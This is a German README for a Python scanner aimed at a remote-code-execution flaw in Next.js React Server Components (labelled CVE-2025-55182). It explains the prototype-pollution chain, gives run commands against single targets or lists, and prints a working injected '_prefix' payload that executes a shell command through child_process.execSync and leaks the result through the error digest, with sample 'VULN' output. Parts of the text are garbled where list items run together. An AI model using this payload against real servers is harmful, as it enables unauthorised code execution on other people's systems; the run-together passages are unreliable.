
Sicherheitsscanner für CVE-2025-55182 - Kritische RCE-Sicherheitslücke in React Server Components
Dieses Tool prüft, ob ein Ziel für CVE‑2025‑55182 anfällig ist, einen Remote Code Execution-Fehler, der durch unsichere Handhabung von RSC (React Server Components)-Modell-Payloads in Next.js verursacht wird.
Die Schwachstelle verknüpft Prototype Pollution → Deserialisierungsmissbrauch → serverseitige JavaScript-Ausführung.
Haftungsausschluss: Verwenden Sie dies nur auf Systemen, die Ihnen rechtmäßig gehören oder für die Sie eine ausdrückliche Genehmigung haben. Unberechtigtes Testen = Straftat, Bruder.
Next.js verarbeitet intern spezielle „Model“-Objekte, die über multipart/form-data gesendet werden.
Wenn ein Angreifer eine bösartige Struktur wie einen gefälschten thenable injiziert, kann er Folgendes manipulieren:
__proto___response._prefixconstructor.constructorDies führt dazu, dass der Server angreifergesteuertes JavaScript auswertet, was zu vollständiger RCE führt.
-u) oder eine Liste von Zielen (-l)id) aus dem Server-Fehler-Digestfoxvuln.txtpython3 main.py -u https://target.com
python3 main.py -l list.txt
Der Payload missbraucht process.mainModule.require('child_process').execSync() über injizierten _prefix:
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
Dies zwingt den Server, id auszuführen und das Ergebnis im ausgelösten Digest preiszugeben (da RSC-Fehler absichtlich ein strukturiertes „digest“-Feld zurückgeben).
Anfälliges Ziel:
[+] Testing: https://victim.com
[VULN] user : uid=1000(www-data)
Nicht anfällig:
[+] Testing: https://secure.com
[NOT VULN]
Alle bestätigten anfälligen URLs werden gespeichert in:
foxvuln.txt
Format:
https://victim.com => uid=1000(www-data)
/ verarbeitet